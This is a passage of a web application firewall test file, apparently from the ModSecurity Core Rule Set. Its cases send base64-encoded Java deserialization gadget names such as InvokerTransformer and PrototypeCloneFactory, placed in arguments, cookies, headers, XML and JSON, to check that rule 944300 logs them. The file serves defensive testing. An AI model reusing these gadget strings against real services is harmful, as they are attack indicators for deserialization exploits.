headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "aW52b2tlcnRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-206 - desc: "Content-Type text/plain includes keyword aW52b2tlcnRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=aW52b2tlcnRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-207 - desc: "Content-Type application/json arg value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"aW52b2tlcnRyYW5zZm9ybWVy\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-208 - desc: "Content-Type application/json arg name includes keyword aW52b2tlcnRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 
Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"aW52b2tlcnRyYW5zZm9ybWVy\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-209 - desc: "Argument test includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=Gludm9rZXJ0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-210 - desc: "Argument name includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "Gludm9rZXJ0cmFuc2Zvcm1lcg=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-211 - desc: "Cookie test includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Gludm9rZXJ0cmFuc2Zvcm1lcg - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-212 - desc: "Cookie name includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Gludm9rZXJ0cmFuc2Zvcm1lcg=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-213 - desc: "Request header test includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Gludm9rZXJ0cmFuc2Zvcm1lcg - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-214 - desc: "XML attribute value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-215 - desc: "XML element value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "Gludm9rZXJ0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-216 - desc: "Nested XML element value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "Gludm9rZXJ0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-217 - desc: "Content-Type text/plain includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: 
"ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=Gludm9rZXJ0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-218 - desc: "Content-Type application/json arg value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"Gludm9rZXJ0cmFuc2Zvcm1lcg\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-219 - desc: "Content-Type application/json arg name includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"Gludm9rZXJ0cmFuc2Zvcm1lcg\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-220 - desc: "Argument test includes keyword BpbnZva2VydHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: 
"gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=BpbnZva2VydHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-221 - desc: "Argument name includes keyword BpbnZva2VydHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "BpbnZva2VydHJhbnNmb3JtZXI=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-222 - desc: "Cookie test includes keyword BpbnZva2VydHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=BpbnZva2VydHJhbnNmb3JtZXI - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-223 - desc: "Cookie name includes keyword BpbnZva2VydHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" 
- Content-Type: "application/x-www-form-urlencoded" - Cookie: BpbnZva2VydHJhbnNmb3JtZXI=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-224 - desc: "Request header test includes keyword BpbnZva2VydHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: BpbnZva2VydHJhbnNmb3JtZXI - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-225 - desc: "XML attribute value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-226 - desc: "XML element value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" 
- version: "HTTP/1.0" - data: "BpbnZva2VydHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-227 - desc: "Nested XML element value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "BpbnZva2VydHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-228 - desc: "Content-Type text/plain includes keyword BpbnZva2VydHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=BpbnZva2VydHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-229 - desc: "Content-Type application/json arg value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"BpbnZva2VydHJhbnNmb3JtZXI\"}" - output: - 
log_contains: "id \"944300\"" - - - - test_title: 944300-230 - desc: "Content-Type application/json arg name includes keyword BpbnZva2VydHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"BpbnZva2VydHJhbnNmb3JtZXI\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-231 - desc: "Argument test includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=cHJvdG90eXBlY2xvbmVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-232 - desc: "Argument name includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5=test" - output: - log_contains: "id \"944300\"" - - - - 
test_title: 944300-233 - desc: "Cookie test includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=cHJvdG90eXBlY2xvbmVmYWN0b3J5 - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-234 - desc: "Cookie name includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: cHJvdG90eXBlY2xvbmVmYWN0b3J5=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-235 - desc: "Request header test includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: cHJvdG90eXBlY2xvbmVmYWN0b3J5 - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" 
- - - - test_title: 944300-236 - desc: "XML attribute value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-237 - desc: "XML element value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-238 - desc: "Nested XML element value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-239 - desc: "Content-Type text/plain includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" - 
stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=cHJvdG90eXBlY2xvbmVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-240 - desc: "Content-Type application/json arg value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"cHJvdG90eXBlY2xvbmVmYWN0b3J5\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-241 - desc: "Content-Type application/json arg name includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"cHJvdG90eXBlY2xvbmVmYWN0b3J5\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-242 - desc: "Argument test includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" - stages: - - - stage: - input: - 
dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-243 - desc: "Argument name includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-244 - desc: "Cookie test includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-245 - desc: "Cookie name includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - 
port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: HByb3RvdHlwZWNsb25lZmFjdG9yeQ=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-246 - desc: "Request header test includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: HByb3RvdHlwZWNsb25lZmFjdG9yeQ - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-247 - desc: "XML attribute value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" - stages: - - - 